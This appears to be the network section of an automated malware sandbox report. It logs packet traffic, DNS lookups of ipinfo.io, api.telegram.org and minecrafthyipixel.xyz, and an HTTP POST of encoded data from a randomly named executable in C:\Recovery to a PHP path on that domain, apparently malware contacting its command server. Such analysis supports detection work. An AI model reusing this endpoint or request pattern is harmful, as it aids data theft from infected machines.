                                                                                                                                    Apr 19, 2024 13:44:14.112256050 CEST8049908104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.112454891 CEST4990880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.216942072 CEST8049909104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.217005014 CEST8049909104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.217255116 CEST4990980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.322006941 CEST8049909104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.488500118 CEST8049909104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.488563061 CEST8049909104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.489062071 CEST4990980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.612206936 CEST4990980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.612615108 CEST4991080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.717612028 CEST8049909104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.717674971 CEST8049910104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.717844963 CEST4991080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.717881918 CEST4991080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.717988014 CEST4990980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.823180914 CEST8049910104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.823326111 CEST8049910104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:14.823451996 CEST4991080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:14.928272963 CEST8049910104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.084517002 CEST8049910104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.084584951 CEST8049910104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.084652901 CEST4991080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.206974030 CEST4991080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.207837105 CEST4991180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.313024998 CEST8049911104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.313086987 CEST8049910104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.313273907 CEST4991080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.313389063 CEST4991180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.313389063 CEST4991180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.418376923 CEST8049911104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.418493986 CEST8049911104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.418864965 CEST4991180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.523616076 CEST8049911104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.775984049 CEST8049911104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.776045084 CEST8049911104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.776216984 CEST4991180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.891752958 CEST4991180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.891940117 CEST4991280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.996498108 CEST8049912104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.996617079 CEST4991280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.996684074 CEST4991280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:15.997241974 CEST8049911104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:15.997438908 CEST4991180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.101224899 CEST8049912104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.101279974 CEST8049912104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.101396084 CEST4991280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.206054926 CEST8049912104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.358812094 CEST8049912104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.358875990 CEST8049912104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.358926058 CEST4991280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.470841885 CEST4991280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.471837044 CEST4991380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.576220036 CEST8049912104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.576267958 CEST4991280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.576278925 CEST8049913104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.576358080 CEST4991380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.576459885 CEST4991380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.680785894 CEST8049913104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.680862904 CEST8049913104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.680963993 CEST4991380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:16.785602093 CEST8049913104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.965631962 CEST8049913104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.965692997 CEST8049913104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:16.965794086 CEST4991380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.079967976 CEST4991380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.080305099 CEST4991480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.185278893 CEST8049914104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.185343027 CEST8049913104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.185368061 CEST4991480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.185384035 CEST4991380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.185497999 CEST4991480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.290330887 CEST8049914104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.290391922 CEST8049914104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.290540934 CEST4991480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.395344019 CEST8049914104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.641258001 CEST8049914104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.641321898 CEST8049914104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.641597986 CEST4991480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.765883923 CEST4991480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.766501904 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.870985031 CEST8049914104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.871046066 CEST8049915104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.871083975 CEST4991480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.871246099 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.871247053 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:17.975999117 CEST8049915104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.976428032 CEST8049915104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:17.976902008 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.081975937 CEST8049915104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.306138992 CEST4991680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.306473970 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.337733030 CEST8049915104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.337794065 CEST8049915104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.337836027 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.337882996 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.410712957 CEST8049916104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.410880089 CEST4991680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.410880089 CEST4991680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.411288977 CEST8049915104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.411355019 CEST4991580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.423741102 CEST4991780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.515465021 CEST8049916104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.515522957 CEST8049916104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.515650034 CEST4991680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.529175997 CEST8049917104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.529367924 CEST4991780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.529369116 CEST4991780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:18.621325970 CEST8049916104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.633907080 CEST8049917104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:18.634421110 CEST8049917104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:25.927653074 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.032043934 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.185456991 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.185483932 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.185576916 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.297555923 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.297909021 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.402323008 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.402348995 CEST8049930104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.407392979 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.407394886 CEST4993080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.407507896 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.511923075 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.511984110 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.512141943 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.617090940 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.857815027 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.857877016 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:26.857937098 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.969854116 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:26.970705032 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.074909925 CEST8049931104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.074974060 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.074980021 CEST4993180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.075037956 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.075130939 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.179403067 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.180314064 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.180527925 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.285207033 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.551052094 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.551115990 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.553685904 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.674159050 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.674257040 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.778549910 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.779866934 CEST8049932104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.781961918 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.781970024 CEST4993280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.781963110 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.886409998 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.886681080 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:27.887708902 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:27.992247105 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.146203041 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.146265984 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.146512985 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.269105911 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.269236088 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.373558044 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.373723030 CEST8049933104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.373924017 CEST4993380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.373927116 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.373927116 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.478410006 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.478468895 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.490915060 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:28.595196009 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.748598099 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.748665094 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:28.748821020 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.036053896 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.036281109 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.140650988 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.140883923 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.140885115 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.141341925 CEST8049934104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.141539097 CEST4993480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.245388031 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.246015072 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.246387959 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.273794889 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.273794889 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.351022005 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.378945112 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.379005909 CEST8049935104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:29.379199028 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:29.379199028 CEST4993580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.323599100 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.391119957 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.428186893 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.430380106 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.430531979 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.495309114 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.495500088 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.495500088 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.534910917 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.599881887 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.600650072 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.600943089 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.705400944 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.797111034 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.797194958 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.797393084 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.868021011 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.868082047 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:30.868221998 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.998034954 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.998197079 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:30.998795033 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103379011 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.103445053 CEST8049937104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.103480101 CEST8049936104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.103503942 CEST4993780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103553057 CEST4993680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103563070 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.103835106 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.208432913 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.208529949 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.208756924 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.313410044 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.475678921 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.475744009 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.475992918 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.594959974 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.598262072 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.699965954 CEST8049938104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.701164961 CEST4993880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.702641964 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.702722073 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.702852964 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.807321072 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.807384968 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:31.807733059 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:31.912334919 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.171611071 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.171679974 CEST8049939104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.171845913 CEST4993980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.284002066 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.388483047 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.388577938 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.388678074 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.493880033 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.494462967 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.494594097 CEST4994080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:32.599114895 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.764496088 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.764554977 CEST8049940104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:32.764619112 CEST4994080192.168.2.4104.21.57.61
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 13:41:58.279858112 CEST | 50117 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 13:41:58.384975910 CEST | 53 | 50117 | 1.1.1.1 | 192.168.2.4
Apr 19, 2024 13:41:59.491413116 CEST | 64427 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 13:41:59.596930981 CEST | 53 | 64427 | 1.1.1.1 | 192.168.2.4
Apr 19, 2024 13:42:32.970161915 CEST | 60321 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 13:42:33.112523079 CEST | 53 | 60321 | 1.1.1.1 | 192.168.2.4
Apr 19, 2024 13:42:37.181332111 CEST | 56245 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 13:42:37.286865950 CEST | 53 | 56245 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 19, 2024 13:41:58.279858112 CEST | 192.168.2.4 | 1.1.1.1 | 0x1fdb | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Apr 19, 2024 13:41:59.491413116 CEST | 192.168.2.4 | 1.1.1.1 | 0xbd82 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Apr 19, 2024 13:42:32.970161915 CEST | 192.168.2.4 | 1.1.1.1 | 0x6799 | Standard query (0) | minecrafthyipixel.xyz | A (IP address) | IN (0x0001) | false
Apr 19, 2024 13:42:37.181332111 CEST | 192.168.2.4 | 1.1.1.1 | 0xf5e8 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2024 13:41:58.384975910 CEST | 1.1.1.1 | 192.168.2.4 | 0x1fdb | No error (0) | ipinfo.io |  | 34.117.186.192 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 13:41:59.596930981 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd82 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 13:42:33.112523079 CEST | 1.1.1.1 | 192.168.2.4 | 0x6799 | No error (0) | minecrafthyipixel.xyz |  | 104.21.57.61 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 13:42:33.112523079 CEST | 1.1.1.1 | 192.168.2.4 | 0x6799 | No error (0) | minecrafthyipixel.xyz |  | 172.67.189.92 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 13:42:37.286865950 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5e8 | No error (0) | ipinfo.io |  | 34.117.186.192 | A (IP address) | IN (0x0001) | false
                                                                                                                                    • ipinfo.io
                                                                                                                                    • api.telegram.org
                                                                                                                                    • minecrafthyipixel.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:33.224119902 CEST | 385 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 344
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:33.328784943 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:33.329711914 CEST | 344 | OUT | Data Raw: 05 05 01 02 06 01 01 01 05 06 02 01 02 0d 01 0b 00 07 05 08 02 02 03 0c 02 0f 0f 53 04 05 03 08 0a 00 07 59 02 04 04 05 0f 06 05 00 04 07 05 0f 03 0a 0f 08 0f 0e 04 51 01 02 05 0d 07 0b 06 0b 05 03 0c 00 07 51 04 03 0f 07 0c 52 0d 00 0d 04 05 02
                                                                                                                                    Data Ascii: SYQQRW\L}P|py[`\aBvvkRk|aw|h|s|oU{{sa[kSRCc^o]}u~V@z}fA~\a
Apr 19, 2024 13:42:33.711438894 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
